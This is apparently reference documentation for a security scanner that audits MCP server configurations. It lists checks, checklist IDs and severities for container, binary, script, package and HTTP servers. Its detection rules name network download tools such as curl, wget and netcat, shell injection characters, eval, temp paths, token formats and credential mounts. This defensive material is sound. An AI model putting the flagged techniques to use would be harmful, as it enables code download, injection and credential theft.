| Check ID | Name | Description |
|---|---|---|
type.detection | Server Type | Classifies the server as package manager, container, binary, script, or HTTP based on command and transport. All other checks depend on its output. |
universal.command_sanitization | Command Safety | Detects dangerous patterns in command and args: privilege escalation, shell injection, network downloads, dynamic code execution, and temp path usage. |
universal.credential_detection | Credentials | Finds plaintext credentials in args, URLs, and environment variables — AWS keys, GitHub/Stripe/Anthropic/OpenAI tokens, JWTs, URL credentials, and sensitive env var names. |
universal.registry.verification | Registry Listing | Checks whether the server is listed in the official MCP Registry. |
universal.github.trust | GitHub Trust | Evaluates trust signals — archived status, last activity, license, stars, contributor count. Cross-validates repo URLs across sources. |
script.location | Script Location | Flags scripts running from unsafe locations like /tmp or home directories. |
script.permissions | Script Permissions | Detects world-writable scripts. |
binary.location | Binary Location | Evaluates binary path safety — system paths, /opt, home dirs, temp dirs, and unknown locations. |
binary.permissions | Binary Permissions | Detects world-writable or group-writable binaries. |
container.isolation | Container Isolation | Flags --privileged mode, dangerous capabilities (SYS_ADMIN), host namespace sharing, missing --cap-drop, and writable filesystems. |
container.volumes | Container Volumes | Flags dangerous volume mounts — root filesystem, /etc, Docker socket, SSH keys, cloud credentials, and kube config. |
container.image | Container Image | Checks whether images use digest pinning (@sha256:) vs mutable tags. Looks for Sigstore attestations. |
container.registry.existence | Container Registry | Verifies the container image exists in its OCI registry. Flags digest mismatches as possible tampering. |
container.registry.signature | Container Signature | Checks whether the image has a cosign signature with keyless/Fulcio certificates. |
package.vulnerability | Vulnerabilities | Queries OSV.dev for known CVEs and malware in npm/PyPI packages. Severity mapped from CVSS score. |
package.typosquatting | Typosquatting | Detects similarly-named packages that could indicate a typosquatting attack. |
package.distribution | Distribution | Evaluates package adoption — download counts and package age. |
package.repository | Source Repository | Checks whether the package links to a source repository. Cross-checks npm, PyPI, deps.dev, and MCP Registry. |
package.unscoped_variant | Unscoped Variant | For scoped npm packages (@scope/pkg): checks if the unscoped variant has known malware or vulnerabilities. |
http.oauth | OAuth | For public HTTP/SSE servers: discovers OAuth/OIDC configuration. Flags missing authentication and HTTP-only endpoints. |
Check Applicability by Server Type
Not all checks apply to all server types. The scanner automatically skips checks that don’t apply and marks them asskip in findings.
| Server Type | Applicable Checks |
|---|---|
| Package Manager (npx, bunx, uvx…) | Server Type, Command Safety, Credentials, Registry Listing, Vulnerabilities, Typosquatting, Distribution, Source Repository, Unscoped Variant, GitHub Trust |
| Container (docker, podman…) | Server Type, Command Safety, Credentials, Container Isolation, Container Volumes, Container Image, Container Registry, Container Signature, Registry Listing, GitHub Trust |
| Binary | Server Type, Command Safety, Credentials, Binary Location, Binary Permissions, Registry Listing, GitHub Trust |
| Script (python, node…) | Server Type, Command Safety, Credentials, Script Location, Script Permissions, Registry Listing, GitHub Trust |
| Public HTTP/SSE | Server Type, Credentials, Registry Listing, GitHub Trust, OAuth |
| Local HTTP/SSE | Server Type, Credentials |
Checklist IDs
Each finding includes achecklist_id in its metadata field. These IDs identify the exact sub-check that triggered the finding.
ST — Server Type
| ID | Severity | Description |
|---|---|---|
ST-1.1 | skip | Package manager server detected |
ST-1.2 | note | Container runtime (Docker, Podman) |
ST-1.3 | note | Local binary |
ST-1.4 | medium | Script-based server |
ST-1.5 | medium | Unknown command — not recognized |
ST-2.1 | medium | Local/private network server |
ST-2.3 | note / high | Public server — note if HTTPS, high if unencrypted HTTP |
ST-2.5 | high | Unreachable server — URL missing or invalid |
UC-1 — Command Safety
| ID | Severity | Description |
|---|---|---|
UC-1.1 | critical | Sudo / administrator privileges requested |
UC-1.2 | critical | Shell injection metacharacters (;, &&, ||, $(, backtick, ${) |
UC-1.3 | high | Network download commands (curl, wget, netcat, fetch, aria2c, axel) |
UC-1.4 | high | Shell execution (bash/sh/zsh -c) |
UC-1.5 | high | Dynamic execution (--exec, -e, eval, exec()) |
UC-1.6 | high | Temporary paths (/tmp/, /var/tmp/, /dev/shm/) |
UC-2 — MCP Registry Verification
| ID | Severity | Description |
|---|---|---|
UC-2.1 | note | Listed in Official MCP Registry (active) |
UC-2.2 | high | Removed from Official MCP Registry |
UC-2.3 | medium | Not listed in Official MCP Registry |
UC-3 — GitHub Trust
| ID | Severity | Description |
|---|---|---|
UC-3.1 | note / medium / high | Repository trust evaluation — note if well-established, medium for limited trust signals, high if archived |
UC-3.2 | high | Repository URL mismatch across sources (possible supply chain attack) |
CD-1 — Credential Detection
| ID | Severity | Description |
|---|---|---|
CD-1.1 | critical | Hardcoded credentials — AWS keys, GitHub/Stripe/Slack/Anthropic/OpenAI tokens, Google API keys |
CD-1.2 | high | High-sensitivity tokens — GitLab PATs, JWTs |
CD-1.3 | medium | Generic API key with common prefix (sk-, api_, key_, token_) or env var credential reference |
CD-1.5 | critical | Credentials embedded in URL (://user:pass@host) |
SC-1 — Script Location
| ID | Severity | Description |
|---|---|---|
SC-1.1 | critical | Script in temporary location (/tmp, /var/tmp, /dev/shm) |
SC-1.2 | medium | Script in user home directory |
SC-1.3 | note / high | Location OK (note), or could not determine path (high) |
SC-2 — Script Permissions
| ID | Severity | Description |
|---|---|---|
SC-2.1 | critical / high / note | World-writable (critical), permissions unavailable (high), permissions OK (note) |
BN-1 — Binary Location
| ID | Severity | Description |
|---|---|---|
BN-1.1 | note | Binary in protected system location (/usr/bin, /usr/local/bin) |
BN-1.2 | medium | Binary in /opt directory |
BN-1.3 | medium | Binary in user home directory |
BN-1.4 | critical | Binary in temporary location (/tmp, /var/tmp, /dev/shm) |
BN-1.5 | high | Non-absolute path or unknown location |
BN-2 — Binary Permissions
| ID | Severity | Description |
|---|---|---|
BN-2.1 | critical / note | World-writable (critical), permissions OK (note) |
BN-2.2 | high | Group-writable binary |
CT-1 — Container Isolation
| ID | Severity | Description |
|---|---|---|
CT-1.1 | critical / note | Runs with --privileged (critical), isolation OK (note) |
CT-1.2 | critical | Dangerous capabilities added (SYS_ADMIN, ALL, SYS_PTRACE, NET_ADMIN) |
CT-1.3 | critical | Shares host namespaces (--pid=host, --network=host) |
CT-1.4 | medium | No --cap-drop to restrict capabilities |
CT-1.5 | medium | Writable filesystem (no --read-only) |
CT-2 — Container Volumes
| ID | Severity | Description |
|---|---|---|
CT-2.1 | high / note | Root filesystem mounted (high), volume configuration OK (note) |
CT-2.2 | high | Mounts /etc (system configuration) |
CT-2.3 | high | Mounts Docker socket — container escape risk |
CT-2.4 | high | Mounts sensitive credentials (~/.ssh, ~/.aws, ~/.kube) |
CT-3 — Container Image Pinning
| ID | Severity | Description |
|---|---|---|
CT-3.1 | note | Image uses SHA256 digest pinning |
CT-3.2 | medium | Image uses mutable tag (not digest-pinned) |
CT-3.3 | medium | Image uses implicit :latest tag |
CT-4 — Sigstore Attestation
| ID | Severity | Description |
|---|---|---|
CT-4.1 | note | Sigstore attestation verified |
CT-4.2 | note | No Sigstore attestation found |
CT-5 — Container Registry
| ID | Severity | Description |
|---|---|---|
CT-5.1 | note | Image verified in registry |
CT-5.2 | critical | Image digest mismatch — possible tampering |
CT-5.3 | high | Image not found in registry |
CT-6 — Container Signature
| ID | Severity | Description |
|---|---|---|
CT-6.1 | note | Cosign signature detected |
CT-6.2 | note | Keyless (Fulcio) signature with certificate |
CT-6.3 | medium | No cosign signature found |
PH-3 — OAuth / HTTP Auth
| ID | Severity | Description |
|---|---|---|
PH-3.1 | critical | Public server returns data without authentication |
PH-3.2 | note | Non-OAuth authentication detected (401/403 without OAuth metadata) |
PH-3.3 | note | Server implements OAuth/OpenID Connect |
PH-3.4 | high | No OAuth discovery endpoints and auth status undetermined |
PM-1 — Package Vulnerabilities
| ID | Severity | Description |
|---|---|---|
PM-1.1 | critical | Critical vulnerability (CVSS ≥ 9.0) |
PM-1.2 | high | High vulnerability (CVSS 7.0–8.9) |
PM-1.3 | medium | Moderate vulnerability (CVSS 4.0–6.9) |
PM-1.4 | note | Low vulnerability (CVSS < 4.0) |
PM-2 — Package Malware
| ID | Severity | Description |
|---|---|---|
PM-2.1 | critical | Known malware detected |
PM-3 — Source Repository
| ID | Severity | Description |
|---|---|---|
PM-3.1 | critical | No source repository linked to package |
PM-3.3 | note | Source repository verified |
PM-5 — Typosquatting
| ID | Severity | Description |
|---|---|---|
PM-5.1 | high / note | Similar package names detected (high), none detected (note) |
PM-6 — Package Distribution
| ID | Severity | Description |
|---|---|---|
PM-6.1 | high / medium / note | Very low downloads (high), low downloads or young package (medium), adoption OK (note) |
PM-8 — Unscoped Variant
| ID | Severity | Description |
|---|---|---|
PM-8.1 | high / medium | Malware in unscoped variant (high), vulnerabilities in unscoped variant (medium) |